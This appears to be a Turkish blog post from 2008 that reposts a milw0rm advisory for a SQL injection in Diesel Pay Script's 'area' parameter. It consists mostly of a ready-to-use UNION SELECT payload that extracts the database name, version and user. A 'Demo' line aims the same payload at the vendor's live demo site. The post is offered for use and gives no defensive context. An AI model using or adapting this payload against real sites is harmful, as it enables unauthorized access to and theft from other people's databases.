"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

21 Eylül 2008 Pazar

Diesel Pay Script (area) Remote SQL Injection Vulnerability

Diesel Pay Script (area) Remote SQL Injection Vulnerability

Discovered By: ZoRLu

http://www.milw0rm.com/exploits/6502

Exploit:

http://localhost/script_path/index.php?a=browse&area=[SQL]

[SQL]=

ZoRLu'+union+select+null,null,null,null,null,concat(database(),0x3a,version(),0x3a,user()),null/*

Demo:

http://www.dieselscripts.com/demo/dieselpay/index.php?a=browse&area=ZoRLu'+union+select+null,null,null,null,null,concat(database(),0x3a,version(),0x3a,user()),null/*



0 yorum:

 
Dizi